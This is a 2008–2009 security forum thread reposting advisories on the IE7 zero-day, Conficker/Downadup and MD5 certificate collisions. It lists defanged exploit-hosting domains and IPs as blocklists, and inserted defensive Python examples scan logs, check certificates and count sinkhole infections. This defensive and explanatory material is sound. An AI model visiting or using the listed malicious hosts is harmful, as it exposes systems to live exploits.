evetlog .3322 .org - 218.9.170.106 (was recently 123.165.49.135)
The IP addresses are of course subject to change, so we recommend resolving them when appropriate for traffic monitoring/blocking...."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/12/2008 - 14:17 UTC/GMT

:fear::fear:

AplusWebMaster
2008-12-14, 14:18
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
"...Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well...
vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75
...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."
Page last modified on December 14, 2008, at 01:13 AM <<<

:fear::fear:

AplusWebMaster
2008-12-15, 04:00
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/14/2008 - 18:26 UTC/GMT:
( additions - Shadowserver recommended blocklist updates )
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

Highly recommended that you NOT visit these sites. "The majority if not all of them also house several other exploits for different vulnerabilities as well"...

:fear:

AplusWebMaster
2008-12-15, 08:15
FYI... Shadowserver IEv7 0-day exploit sites / recommended blocklist sites...
Please do not visit -any- of these sites. The majority if not all of them also house several other exploits for different vulnerabilities as well...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it relates to this threat the following:
www .17gamo .com - 207.154.202.219 *seen from SQL injection attacks*
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 ..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/16/2008 - 13:09 UTC/GMT

vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75

Updated 12/14/2008 - 18:26 UTC/GMT:
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

(Keep checking the Shadowserver URLs frequently for new updates)

:fear::fear::fear:
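
The Shadowserver posts above (the 10 and 11 December lists and this consolidated one) publish their indicators defanged ("www .17gamo .com", "vw. wd2a .cn") and recommend blocking or watching for traffic to them. Added example, not code from Shadowserver or this thread: a Python helper that re-fangs the indicators exactly as they appear on the page, then matches DNS query-log lines and firewall lines against them, catching subdomains as well as exact names. The DNS and firewall log lines are constructed for the example (BIND-style query log and an iptables-style line); the choice to also block the registrable name without its "www." label is this example's own.

```python
import re

# Indicators copied verbatim (defanged) from the Shadowserver posts quoted above.
RAW_INDICATORS = """
www .17gamo .com - 207.154.202.219
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106
vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75
buxhere .com - 203.169.184.78 / [country: HK]
517wyt .com - 66.90.67.98 / [country: US]
"""

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
DNS_QUERY = re.compile(r"query: (\S+) IN ")        # BIND-style query log
DST_IP = re.compile(r"\bdst=(\d{1,3}(?:\.\d{1,3}){3})")  # iptables-style firewall log


def refang(domain):
    """'www .17gamo .com', 'vw. wd2a .cn' or 'bad[dot]com' -> plain lowercase hostname."""
    d = domain.strip().lower()
    for token in ("[dot]", "[.]", "(dot)"):
        d = d.replace(token, ".")
    d = re.sub(r"\s*\.\s*", ".", d)   # remove the spaces inserted around dots
    return d.strip(".")


def parse_indicators(text):
    """Return (domains, ips) from 'host - ip [/ note]' lines; '#' lines are comments."""
    domains, ips = set(), set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host_part, _, rest = line.partition(" - ")
        d = refang(host_part)
        domains.add(d)
        if d.startswith("www."):          # design choice: the bare name is just as bad
            domains.add(d[4:])
        m = IPV4.search(rest)
        if m:
            ips.add(m.group(0))
    return domains, ips


def domain_matches(name, blocked_domains):
    """Return the blocked entry that name or one of its parent domains equals, else None."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in blocked_domains:
            return candidate
    return None


def scan_logs(lines, blocked_domains, blocked_ips):
    """Return (kind, indicator, line) for every DNS query or destination IP on the list."""
    hits = []
    for line in lines:
        m = DNS_QUERY.search(line)
        if m:
            hit = domain_matches(m.group(1), blocked_domains)
            if hit:
                hits.append(("dns", hit, line))
        m = DST_IP.search(line)
        if m and m.group(1) in blocked_ips:
            hits.append(("ip", m.group(1), line))
    return hits


# Constructed sample log lines (192.0.2.10 is documentation address space).
SAMPLE_LOG = [
    "11-Dec-2008 10:00:01.123 client 10.0.0.5#53211: query: www.17gamo.com IN A +",
    "11-Dec-2008 10:00:02.456 client 10.0.0.5#53211: query: www.example.com IN A +",
    "11-Dec-2008 10:00:03.789 client 10.0.0.7#40112: query: EVETLOG.3322.ORG. IN A +",
    "Dec 11 10:00:04 fw kernel: ACCEPT src=10.0.0.7 dst=218.9.170.106 proto=TCP dpt=3020",
    "Dec 11 10:00:05 fw kernel: ACCEPT src=10.0.0.8 dst=192.0.2.10 proto=TCP dpt=443",
]

if __name__ == "__main__":
    domains, ips = parse_indicators(RAW_INDICATORS)
    for kind, indicator, line in scan_logs(SAMPLE_LOG, domains, ips):
        print(f"{kind:3} {indicator:20} {line}")
```

As the Shadowserver post says, the IP addresses change; re-resolve the domain list when refreshing `blocked_ips`, and keep the domain match as the primary signal.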

AplusWebMaster
2008-12-16, 22:55
FYI...

- http://isc.sans.org/diary.html?storyid=5497
Last Updated: 2008-12-16 20:23:07 UTC - "Microsoft has announced that they will be releasing an out of cycle security bulletin tomorrow for the IE zero day*..."
* http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 16, 2008 - "...This bulletin advance notification will be replaced with the revised December bulletin summary on December 17, 2008. The revised bulletin summary will include the out-of-band security bulletin...
Bulletin Identifier: IE ...
Aggregate Severity Rating: Critical ..."

:fear:

AplusWebMaster
2008-12-17, 20:25
FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
December 17, 2008 - "Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS08-078* to address this issue. For more information about this issue, including download links for an available security update, please review MS08-078. The vulnerability addressed is the Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844**..."

** http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4844

> http://support.microsoft.com/?kbid=960714
Last Review: December 18, 2008 - Revision: 2.0

Microsoft Security Bulletin MS08-078 - Internet Explorer
Security Update for Internet Explorer (960714)
* http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx
December 17, 2008
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...
(May require restart)

:fear:

AplusWebMaster
2008-12-23, 12:35
FYI...

Microsoft Security Advisory (961040)
Vulnerability in SQL Server Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961040.mspx
December 22, 2008 - "Microsoft is investigating new public reports of a vulnerability that could allow remote code execution on systems with supported editions of Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon). Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue. Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect systems that have had the workarounds* listed below applied. Currently, Microsoft is not aware of active attacks that use this exploit code or of customer impact at this time. In addition, due to the mitigating factors for default installations of MSDE 2000 and SQL Server 2005 Express, Microsoft is not currently aware of any third-party applications that use MSDE 2000 or SQL Server 2005 Express which would be vulnerable to remote attack. However, Microsoft is actively monitoring this situation to provide customer guidance as necessary...
* Workarounds...
Deny permissions on the sp_replwritetovarbin extended stored procedure..."

- http://support.microsoft.com/kb/961040
December 23, 2008

- http://isc.sans.org/diary.html?storyid=5545
Last Updated: 2008-12-23 14:13:19 UTC
___

- http://www.microsoft.com/technet/security/advisory/961040.mspx
Updated: February 10, 2009 - "...We have issued MS09-004* to address this issue... The vulnerability addressed is the SQL Server sp_replwritetovarbin Limited Memory Overwrite Vulnerability
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416 ..."

* http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx

:fear:

AplusWebMaster
2008-12-30, 21:03
FYI...

Microsoft Security Advisory (961509)
Research proves feasibility of collision attacks against MD5
- http://www.microsoft.com/technet/security/advisory/961509.mspx
December 30, 2008 - "Microsoft is aware that research was published at a security conference proving a successful attack against X.509 digital certificates signed using the MD5 hashing algorithm. This attack method could allow an attacker to generate additional digital certificates with different content that have the same digital signature as an original certificate. The MD5 algorithm had previously shown a vulnerability, but a practical attack had not yet been demonstrated. This new disclosure does not increase risk to customers significantly, as the researchers have not published the cryptographic background to the attack, and the attack is not repeatable without this information. Microsoft is not aware of any active attacks using this issue and is actively working with certificate authorities to ensure they are aware of this new research and is encouraging them to migrate to the newer SHA-1 signing algorithm. While this issue is not a vulnerability in a Microsoft product, Microsoft is actively monitoring the situation and has worked with affected Certificate Authorities to keep customers informed and to provide customer guidance as necessary...
Mitigating Factors...
• Most public Certificate Authority roots no longer use MD5 to sign certificates, but have upgraded to the more secure SHA-1 algorithm. Customers should contact their issuing Certificate Authority for guidance.
• When visited, Web sites that use Extended Validation (EV) certificates show a green address bar in most modern browsers. These certificates are always signed using SHA-1 and as such are not affected by this newly reported research...
Suggested Actions...
• Do not sign digital certificates with MD5
Certificate Authorities should no longer sign newly generated certificates using the MD5 algorithm, as it is known to be prone to collision attacks. Several alternative and more secure technologies are available, including SHA-1, SHA-256, SHA-384 or SHA-512.
Impact of action: Older hardware-based solutions may require upgrading to support these newer technologies...

:fear:
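
The advisory's suggested action is for CAs to stop signing with MD5; the matching check on the relying side is to find out which certificates in a chain or store carry an MD5-based signature. Added example, not code from Microsoft or this thread: a small dependency-free Python DER walker that reads the outer signatureAlgorithm OID of an X.509 certificate and flags MD2/MD4/MD5-with-RSA. The `fake_certificate` helper builds a structurally valid but otherwise empty Certificate SEQUENCE so the example runs offline; real DER or PEM files can be passed to `assess` in the same way.

```python
import base64

# Signature-algorithm OIDs (RFC 3279 / RFC 4055 / RFC 5758).
OID_NAMES = {
    "1.2.840.113549.1.1.2": "md2WithRSAEncryption",
    "1.2.840.113549.1.1.3": "md4WithRSAEncryption",
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
}
WEAK_DIGEST_OIDS = {"1.2.840.113549.1.1.2", "1.2.840.113549.1.1.3", "1.2.840.113549.1.1.4"}


def read_tlv(buf, pos):
    """Read one DER tag/length/value at pos; return (tag, value_bytes, position_after)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        if n == 0:
            raise ValueError("indefinite length is not DER")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(content):
    """Decode OBJECT IDENTIFIER content bytes to dotted form."""
    first = content[0]
    arcs = [2, first - 80] if first >= 80 else [first // 40, first % 40]
    val = 0
    for b in content[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:                   # last byte of this base-128 arc
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def signature_algorithm(cert):
    """Return the dotted OID of the outer signatureAlgorithm of a DER or PEM certificate."""
    if cert.lstrip().startswith(b"-----BEGIN"):
        body = b"".join(l for l in cert.splitlines() if not l.startswith(b"-----"))
        cert = base64.b64decode(body)
    tag, body, _ = read_tlv(cert, 0)
    if tag != 0x30:
        raise ValueError("not a Certificate SEQUENCE")
    _, _tbs, pos = read_tlv(body, 0)         # tbsCertificate, skipped
    tag, algid, _ = read_tlv(body, pos)      # signatureAlgorithm AlgorithmIdentifier
    tag2, oid, _ = read_tlv(algid, 0)
    if tag != 0x30 or tag2 != 0x06:
        raise ValueError("signatureAlgorithm is not SEQUENCE { OID ... }")
    return decode_oid(oid)


def assess(cert):
    """Return (oid, name, is_weak) for a certificate."""
    oid = signature_algorithm(cert)
    return oid, OID_NAMES.get(oid, "unknown"), oid in WEAK_DIGEST_OIDS


# --- constructed test material: a minimal Certificate shell, not a usable certificate ---
def der(tag, content):
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def fake_certificate(sig_oid):
    """Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue } with
    placeholder tbs and signature; only the AlgorithmIdentifier is meaningful."""
    tbs = der(0x30, der(0x02, b"\x01"))
    algid = der(0x30, der(0x06, encode_oid(sig_oid)) + der(0x05, b""))   # OID + NULL params
    sig = der(0x03, b"\x00" + bytes(128))                                # BIT STRING placeholder
    return der(0x30, tbs + algid + sig)


def fake_certificate_pem(sig_oid):
    b64 = base64.b64encode(fake_certificate(sig_oid))
    return b"-----BEGIN CERTIFICATE-----\n" + b64 + b"\n-----END CERTIFICATE-----\n"


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.4", "1.2.840.113549.1.1.11"):
        print(assess(fake_certificate(oid)))
```

Two caveats when using this on real chains: the digest used to sign a certificate is the issuing CA's choice, so the check matters for every certificate the CA signed (leaf and intermediates), while a root's self-signature is irrelevant because roots are trusted by inclusion, not by signature; and the outer signatureAlgorithm must equal the tbsCertificate.signature field, which this walker does not cross-check.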

AplusWebMaster
2008-12-31, 19:00
FYI...

- http://isc.sans.org/diary.html?storyid=5596
Last Updated: 2008-12-31 14:26:41 UTC - "Symantec has identified W32.Downadup.B as a new worm that is spreading by taking advantage of the RPC vulnerability from MS08-067*. It does various things to install and hide itself on the infected computer. It removes any System Restore points that the user has set and disables the Windows Update Service. It looks for ADMIN$ shares on the local network and tries to brute force the share passwords with a built-in dictionary. At this point in time, the worm's purpose appears to be simply to spread and infect as many computers as possible. After January 1, 2009, it will try to reach out to a variety of web sites to pull down an updated copy of itself. You can find examples of the domain names in the Symantec W32.Downadup.B writeup**..."

Vulnerability in Server Service Could Allow Remote Code Execution (958644)
* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

** http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&tabid=2

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250

- http://secunia.com/advisories/32326
Last Update: 2008-10-24
Critical: Highly critical...

MS08-067 out-of-band netapi32.dll security update
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

- http://support.microsoft.com/?kbid=958644

- http://www.us-cert.gov/cas/techalerts/TA08-297A.html

:fear:

AplusWebMaster
2009-01-07, 06:51
FYI...

- http://preview.tinyurl.com/7jxs8z
01-06-2009 (Symantec blogs) - "... the most commonly infected systems appear to be Windows XP SP1 and earlier. Over 500,000 of the infected computers that contacted our server were running these operating system versions. Close behind was Windows XP SP2 and later systems. Windows 2000 and Windows 2003 had smaller shares. We believe that the W32.Downadup.A propagation routine has been very aggressive. It will continue to infect computers in the near future and receive updates via the aforementioned mechanism. Symantec discovered a new variant of this worm on December 30, 2008, dubbed W32.Downadup.B. This updated version contains additional propagation routines and what appears to be an altered domain generation routine. It’s not currently known if this new version was seeded to W32.Downadup.A infections or has independently spread through its own propagation routines.
We strongly encourage all users to ensure that the patches available in MS08-067 have been applied and that antivirus products are fully up-to-date to ensure that this threat does not find its way onto computers."
(Charts available at the URL above.)

:fear::mad::fear:

AplusWebMaster
2009-01-07, 15:16
FYI...

- http://www.f-secure.com/weblog/archives/00001574.html
January 6, 2009 - "Over the last (few) days, we've received reports of corporate networks getting infected with variants of MS08-067 worms. These are mostly Downadup/Conficker variants. The malware uses server-side polymorphism and ACL modification to make network disinfection particularly difficult. A sign of infection is that user accounts become locked out of an Active Directory domain as the worm attempts to crack account passwords using a built-in dictionary. When it fails, it leads to those accounts being locked. We have detailed information about the malware functionality in our Downadup.AL description*. We also have a separate tool available to assist in disinfecting. The tool is available from here**. We also recommend system administrators block access to web sites used by the worm..." (Long list available at the URL above.)

* http://www.f-secure.com/v-descs/worm_w32_downadup_al.shtml

** ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
Last revised: 11/21/2008
CVSS v2 Base Score: 10.0 (HIGH)

:fear::fear::mad:

AplusWebMaster
2009-01-09, 04:56
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jan.mspx
January 8, 2009 - "This is an advance notification of (a) security bulletin that Microsoft is intending to release on January 13, 2009... (1)

Windows Bulletin
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software:
Microsoft Windows 2000 SP4, XPSP2, XPSP3, Server 2003 - Critical
Vista SP1, Server 2008 - Moderate

.

AplusWebMaster
2009-01-09, 21:20
FYI...

Downadup Blocklist
- http://www.f-secure.com/weblog/archives/00001577.html
January 9, 2009 - "Our post on Tuesday included a list of domains used by the Downadup worm. Today's list includes 1,500 additional sites used by the worm*."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist.txt

:fear::fear:

AplusWebMaster
2009-01-10, 03:16
More...

New variants of W32.Downadup.B find new ways to propagate
- http://preview.tinyurl.com/ay432s
01-09-2009 Symantec Security Response Blog - "Symantec has observed an increase in infections relating to W32.Downadup over the holiday period and is urging organizations to apply the patch for Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067) as soon as possible. A new variant of this threat, called W32.Downadup.B, appeared on December 30th and can not only propagate by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability, but can also spread through corporate networks by infecting USB sticks and accessing weak passwords... W32.Downadup.B creates an autorun.inf file on all mapped drives so that the threat automatically executes when the drive is accessed. The threat then monitors for drives that are connected to the compromised computer in order to create an autorun.inf file as soon as the drive becomes accessible. The worm also monitors DNS requests to domains containing certain strings and blocks access to those domains so that it will appear that the network request timed out. This means infected users may not be able to update their security software from those websites. This can be problematic as worm authors generally dish out new variants constantly... Click here** to obtain more information about how to prevent a threat from spreading using the "AutoRun" feature... more detail on the evolution and infection statistics of this threat, check out the earlier Security Response blog posting*..."
W32.Downadup Infection Statistics
* http://preview.tinyurl.com/7jxs8z
01-06-2009 - "...graph shows the statistics, over a 72-hour period, of unique IP addresses versus unique IP address and user-agent pairs..."

** http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2008032111570648

:fear::fear::fear:

AplusWebMaster
2009-01-13, 14:37
FYI...

Preemptive Downadup Domain Blocklist, Jan. 13-16
- http://www.f-secure.com/weblog/archives/00001578.html
January 12, 2009 - "Downadup variants use algorithmically determined URLs to report back to the bad guys. Reverse engineering the worm's code provides us with the method to predict which domains may be used in the future. Today's preemptive blocklist* includes an additional 1,000 URLs that WILL BE used by the Downadup from the 13th to the 16th. Network administrators can use this list as a preventive measure."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist_13_16.txt

- http://isc.sans.org/diary.html?storyid=5671
Last Updated: 2009-01-12 22:43:54 UTC

- http://www.fortiguardcenter.com/reports/MS08-067-Conficker.html
(MS08-067 exploit activity from October 2008 to January 2009...) graphic

:fear::fear:

AplusWebMaster
2009-01-13, 20:26
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jan.mspx
January 13, 2009 - "This bulletin summary lists security bulletin.. released for January 2009... (-1-)

Microsoft Security Bulletin MS09-001
Vulnerabilities in SMB Could Allow Remote Code Execution (958687)
- http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software:
Microsoft Windows 2000 SP4, XPSP2, XPSP3, Server 2003 - Critical
Vista SP1, Server 2008 - Moderate
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5677
Last Updated: 2009-01-13 18:15:14 UTC
___

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4114
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4834
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4835
___

MS09-001: Prioritizing the deployment of the SMB bulletin
- http://preview.tinyurl.com/8elasn
(MS Security Vulnerability Research & Defense blog) - "...In terms of prioritizing the deployment of this update, we recommend updating SMB servers and Domain Controllers immediately since a system DoS would have a high impact. Other configurations should be assessed based on the role of the machine. For example, non-critical workstations could be considered lower priority assuming a system DoS is an acceptable risk. Systems with SMB blocked at the host firewall could also be updated more slowly..."
___

MSRT - Jan.2009 additions...
- http://support.microsoft.com/?kbid=890830
Malicious software family - Tool version - Current severity rating
Win32/Banload - January 2009 (V 2.6) Moderate
Win32/Conficker* - January 2009 (V 2.6) High ...
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Win32%2fConficker
(aka - Downadup)

Download:
- http://preview.tinyurl.com/6bb67
File Name: windows-kb890830-v2.6.exe
Version: 2.6
Date Published: 1/13/2009
___

- http://www.f-secure.com/weblog/archives/00001579.html
January 13, 2009 11:21 GMT - "... final count is: 2,395,963 infections worldwide. This figure is conservative; the real number is certainly higher."
- http://www.f-secure.com/weblog/archives/00001580.html
January 14, 2009 - "...worldwide Downadup infection count... Today's total infection count is an estimated 3,521,230 infections worldwide. That's over one million new infections since yesterday (and we still consider this to be a conservative estimate)."

:fear:

AplusWebMaster
2009-01-16, 01:14
FYI...

- http://preview.tinyurl.com/9fc4ze
January 15, 2009 (Computerworld) - "The worm that has infected several million Windows PCs is causing havoc because nearly a third of all systems remain unpatched 80 days after Microsoft Corp. rolled out an emergency fix, a security expert said today. Based on scans of several hundred thousand customer-owned Windows PCs, Qualys Inc.* concluded that about 30% of the machines have not yet been patched with the "out of cycle" fix Microsoft provided Oct. 23 as security update MS08-067..."
* http://www.qualys.com/research/alerts/view.php/2008-10-23

- http://preview.tinyurl.com/8tr9fg
January 15, 2009 (Avert Labs) - "...While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself..."

NOTES:
1. It appears that this could, in part, be due to an MS Update site problem of a sort. MS08-067 was NOT offered on an XPSP2 system during the monthly update for Nov'08, nor during both of the Dec'08 runs (including the check/update for the IE 0-day fix). MS08-067 appears to have been installed during an XPSP3 update from the MS Update site just before year-end. YMMV.
2. A second XPSP2 machine - checked ReportingEvents.log located in %windir%\SoftwareDistribution ... found MS08-067 (KB958644) installed 10.23.2008, but dates shown in >Control Panel >Add/Remove programs show KB958644 install date occurred when XPSP3 was installed at year-end. WTF.

:fear: :sad: :spider:

AplusWebMaster
2009-01-16, 19:28
FYI...

- http://www.f-secure.com/weblog/archives/00001584.html
January 16, 2009 - "The number of Downadup infections are skyrocketing based on our calculations. From an estimated 2.4 million infected machines to over 8.9 million during the last four days. That's just amazing. We've received a number of queries on just how exactly we're producing our estimates. There's been interest from Internet operators, CERTs, and fellow antivirus researchers. There's also been several posts to our blog comments, doubting our numbers... So let us explain how we are generating the numbers. There are several different variants of Downadup out there. The algorithm to create the domain names vary a bit between the variants. We've been tracking the variant we believe to be most common. It creates 250 possible domains each day. We've registered some selected domains out of this pool and are monitoring the connections being made to them... We first tried to count unique User-Agent headers per IP address, but the results weren't very good as in a standardized corporate network, most machines have identical User-Agents. So, with a little digging we discovered that in the /search/q=NUMBER query, the number is not random. It's basically a global variable in the code, getting incremented (thread-safely through InterlockedIncrement) every time the malware has successfully exploited a machine via MS08-067*. The incrementation is done in the httpd thread of the malware, after it has exploited a machine successfully. So this number tells us how many other computers this machine has exploited since it was last restarted... We wrote a program that parses the logs, extracting the highest "q" value for the IP/User-Agent pairs. These are then added together to get our figures. As you can see now, they are very conservative. And they are showing more than 8 million infected machines right now. The situation with Downadup is not getting better. It's getting worse."
(Complete detail shown at the F-secure URL above.)

* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

:fear: :sad: :fear:
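
F-Secure's post above explains how the infection estimate is produced: parse the sinkhole web logs, take the highest q value seen per IP/User-Agent pair, and add those up. Added example, not F-Secure's program and not code from this thread: a Python implementation of that counting method over constructed Apache combined-format log lines, accepting both the /search?q=N and /search/q=N spellings. How F-Secure counted the reporting hosts themselves is not stated in the quote, so the result reports the number of pairs and the sum of their maximum q values separately.

```python
import re

# Apache/nginx "combined" log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The post writes the beacon as /search/q=NUMBER; accept ?q= as well.
Q_RE = re.compile(r"/search[/?]q=(\d+)")


def parse_line(line):
    """Return (ip, user_agent, q) for a Downadup-style beacon, or None for other requests."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = Q_RE.search(m.group("path"))
    if not q:
        return None
    return m.group("ip"), m.group("ua"), int(q.group(1))


def max_q_per_pair(lines):
    """Highest q reported by each (ip, user_agent) pair; q resets when the host reboots,
    so the maximum over the window is the best lower bound on what it exploited."""
    best = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ua, q = rec
        key = (ip, ua)
        if q > best.get(key, -1):
            best[key] = q
    return best


def estimate(lines):
    """Summarise: how many reporting pairs, and how many hosts they say they exploited."""
    best = max_q_per_pair(lines)
    return {"reporting_pairs": len(best), "sum_of_max_q": sum(best.values())}


# Constructed sample log: two hosts behind one NAT (different User-Agents), a counter
# that dropped after a reboot, and one unrelated request that must be ignored.
UA_XP = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
UA_VISTA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"


def _line(ip, ts, path, ua):
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 12 "-" "{ua}"'


SAMPLE_LOG = [
    _line("10.1.1.1", "15/Jan/2009:10:00:00 +0000", "/search?q=0", UA_XP),
    _line("10.1.1.1", "15/Jan/2009:10:05:00 +0000", "/search?q=3", UA_XP),
    _line("10.1.1.1", "15/Jan/2009:10:10:00 +0000", "/search?q=2", UA_XP),     # after a reboot
    _line("10.1.1.1", "15/Jan/2009:10:11:00 +0000", "/search/q=5", UA_VISTA),  # second host, same NAT
    _line("10.2.2.2", "15/Jan/2009:10:12:00 +0000", "/search?q=7", UA_XP),
    _line("10.3.3.3", "15/Jan/2009:10:13:00 +0000", "/index.html", UA_XP),     # not a beacon
]

if __name__ == "__main__":
    print(estimate(SAMPLE_LOG))
```

The User-Agent split is what lets two hosts behind one NAT be told apart; as the post notes, that still undercounts identically built corporate machines, which is why the figure is a conservative lower bound.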

AplusWebMaster
2009-01-20, 18:19
FYI...

- http://blog.trendmicro.com/the-mess-that-is-worm_downad/
Jan. 20, 2009 - "The North American region has the most number of infected PCs, with users from the United States being hit the most. Japan, China, and Taiwan are also major DOWNAD-affected countries. In Europe, Italy and Spain had the most infections however other countries have also been affected. Users observe the following symptoms when they are infected with WORM_DOWNAD.AD:
• Blocked access to antivirus-related sites
• Disabled services such as Windows Automatic Update Service
• High traffic on affected system’s port 445
• Hidden files even after changes in Folder Options
• Inability to log in using Windows credentials because they are locked out
A .DLL file with random file names and autorun.inf also appear in all mapped drives, and in Internet Explorer and Movie Maker folders under the Program Files directory. The worm locks its dropped copy to prevent users from reading, writing, and deleting the malicious file. It also makes several registry changes to allow simultaneous network connections. By re-infecting machines, this worm manages to keep its malicious activities going on... Patching systems and programs as soon as fixes are made available and disabling autorun* are two of the most important actions required to reduce the risk of infection, infection propagation or reinfection with variant updates..."
(Global map of infections available at the URL above.)

NoDriveTypeAutoRun
* http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93502.mspx?mfr=true

:fear:

AplusWebMaster
2009-01-22, 14:28
FYI...

Inauguration Themed Waledac - New Tactics & New Domains
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090119
